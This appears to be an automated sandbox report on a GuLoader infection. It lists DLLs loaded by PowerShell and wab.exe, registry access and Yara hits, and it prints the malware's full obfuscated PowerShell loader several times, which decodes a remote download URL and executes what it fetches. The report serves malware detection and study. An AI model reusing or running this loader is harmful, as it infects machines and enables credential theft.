Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles Jump to behavior
Source: Binary string: qm.Core.pdb source: powershell.exe, 00000009.00000002.2010987312.0000000007872000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000009.00000002.2010987312.0000000007807000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000009.00000002.2003068899.0000000003320000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("POWERSHELL.exe", ""$Klervske = 1;$Hengivnes='Substrin';$H", "", "", "0");
Yara detected GuLoader
Source: Yara match File source: 0000000C.00000002.2627141009.0000000004605000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2017391660.0000000009585000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2017192523.0000000008C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2007819028.00000000061C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Nazaritism)$global:Overslack = [System.Text.Encoding]::ASCII.GetString($Vvets)$global:Burnfire=$Overslack.substring(305706,29961)<#Projektgruppe Hundrede Constraints Nonterritorially
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Trflerne $Memory $Gyratorkoblede), (Underlagt @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tikkenes = [AppDomain]::CurrentDomain.GetAssemblies()$global:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Sweepsteaket)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Blennophthalmia82, $false).DefineType($Wrapp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Nazaritism)$global:Overslack = [System.Text.Encoding]::ASCII.GetString($Vvets)$global:Burnfire=$Overslack.substring(305706,29961)<#Projektgruppe Hundrede Constraints Nonterritorially
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili 